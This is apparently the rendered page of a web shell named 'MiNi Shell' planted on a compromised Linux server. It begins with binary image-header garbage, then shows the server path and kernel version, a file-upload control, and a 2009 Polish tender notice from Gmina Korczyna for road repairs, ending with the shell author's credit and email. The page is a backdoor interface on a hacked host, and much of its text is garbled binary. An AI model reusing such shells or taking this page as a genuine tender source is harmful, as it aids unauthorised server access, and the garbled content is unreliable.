JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090422/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090422/115412-N-2009.html

<p class="kh_header"><b>Korczyna: Remont cząstkowy nawierzchni dróg gminnych na terenie Gminy Korczyna</b><br>
<b>Numer ogłoszenia: 115412 - 2009; data zamieszczenia: 22.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Korczyna , ul. Rynek 18a, 38-420 Korczyna, woj. podkarpackie, tel. 013 4354080, faks 013 4354096.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> korczyna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont cząstkowy nawierzchni dróg gminnych na terenie Gminy Korczyna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie remontów cząstkowych nawierzchni 
    dróg gminnych masą mineralno-asfaltową  na terenie Gminy wraz z zamknięciem 
    emulsją i grysami - zgodnie z załączonym do SIWZ przedmiarem robót.

2. Wymagania dodatkowe w ramach przedmiotu zamówienia:
    Wykonawca zobowiązuje się :
 a) wykonać przedmiot zamówienia zgodnie zobowiązującymi w tym zakresie  
     przepisami prawnymi, w szczególności Prawem Budowlanym wraz z przepisami 
     wykonawczymi, przepisami BHP, postanowieniami umowy, specyfikacją 
     istotnych warunków zamówienia, zgodnie z aktualnym poziomem wiedzy 
     technicznej, należytą starannością, etyką zawodową przez osoby posiadające 
     wymagane kwalifikacje i uprawnienia,
 b) wykonać przedmiot zamówienia własnymi siłami bez zlecania prac 
     podwykonawcom.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
   1) posiadają uprawnienia do wykonywania określonej działalności lub 
       czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
   2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem 
       technicznym i osobami zdolnymi do wykonania zamówienia,
   3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
       zamówienia,
  4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na 
      podstawie art. 24 ust.1 i 2 ustawy z dnia 29 stycznia 2004r. Prawo zamówień 
      publicznych (Dz. U. z 2007r.  Nr 223 poz. 1655), 
2. Z ubiegania się o udzielenie zamówienia publicznego wyklucza się :
  1) wykonawców, którzy nie spełniają warunków udziału w postępowaniu o 
      zamówienie publiczne, o których mowa w art. 24 ust.1 i2 ustawy z dnia 29 
      stycznia 2004r. Prawo zamówień publicznych (Dz. U. Z 2007r. Nr 223 poz. 
      1655), 
  2) wykonawców, którzy złożyli nieprawdziwe informacje mające wpływ na wynik 
      prowadzonego postępowania ,
  3) wykonawców, którzy nie złożyli oświadczenia o spełnianiu warunków udziału w 
      postępowaniu lub dokumentów potwierdzających spełnianie tych warunków..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Formularz ofertowy z wykorzystaniem wzoru - załącznik Nr 1 do SIWZ,
2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do  
    ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do 
    rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie 
    wcześniej niż  6 miesięcy przed upływem terminu składania ofert.
3. Dokumenty potwierdzające uprawnienie do reprezentacji Wykonawcy przez 
    osoby podpisujące ofertę, o ile nie wynikają z przepisów prawa lub innych 
    dokumentów rejestrowych.
4. Oświadczenie Wykonawcy o spełnianiu warunków wskazanych w art. 22 ust.1 
    ustawy Prawa zamówień publicznych i nie podlegania wykluczeniu z 
    postępowania na podstawie art.24 Prawa zamówień publicznych -  załącznik  Nr 
    2 do SIWZ,
5. Wykaz wykonanych  robót budowlanych w okresie ostatnich 5 lat (2004-
    2008),co najmniej dwóch zamówień  dotyczących przedmiotu zamówienia o 
    wartości nie mniejszej niż 100 000zł, a jeżeli okres prowadzenia działalności jest 
    krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i 
    odbiorców - załącznik Nr 3,
6. Dokumenty potwierdzające, że roboty wymienione w pkt 5 zostały wykonane 
    należycie. 
7. Wykaz osób, które będą wykonywać zamówienie lub będą uczestniczyć w 
    wykonywaniu zamówienia wraz z informacją na temat ich kwalifikacji - załącznik 
    Nr 4,
8. Dokument potwierdzający, że Wykonawca posiada aktualne, wymagane 
    przepisami prawa uprawnienia, jeżeli ustawy nakładają obowiązek posiadania 
    takich uprawnień oraz dokument potwierdzający przynależność do właściwej 
    izby samorządu zawodowego.
9. Wykaz sprzętu do realizacji zamówienia.
10. Oświadczenie o dokonaniu wizji lokalnej placu budowy.
11. Oświadczenie o proponowanym okresie gwarancji - minimum 36 miesięcy licząc 
      od daty odbioru końcowego.
12. Zaświadczenie właściwego Urzędu Skarbowego potwierdzające, że Wykonawca 
      nie zalega z opłacaniem podatków  lub zaświadczenia, że uzyskał zgodę  na 
      zwolnienie, odroczenie, rozłożenie na raty zaległych płatności, lub wstrzymanie 
      w całości wykonania decyzji organu podatkowego - wystawione nie wcześniej 
      niż 3 miesiące  przed upływem terminu składania ofert.
13. Zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych 
     potwierdzające, że wykonawca nie zalega z opłacaniem składek na 
     ubezpieczenie  zdrowotne lub społeczne, wystawione nie wcześniej niż 3 
     miesiące przed upływem terminu  składania ofert.
14. Kosztorys ofertowy z podaniem nakładów robocizny, materiałów i pracy sprzętu 
     oraz określeniem stawki roboczogodziny, kosztów pośrednich, kosztów zakupu 
     materiałów i zysku.

      Dokumenty mogą być przedstawione w formie oryginałów lub kserokopii.
      Dokumenty złożone w formie kserokopii muszą być poświadczone (za zgodność 
      z oryginałem) przez osobę upoważnioną do podpisywania oferty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.korczyna.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Korczyna
ul. Rynek 18a,  pokój nr6
38-420 Korczyna.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.05.2009 godzina 09:30, miejsce: Urząd Gminy Korczyna
ul. Rynek 18a,  pokój nr 13
38-420 Korczyna.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com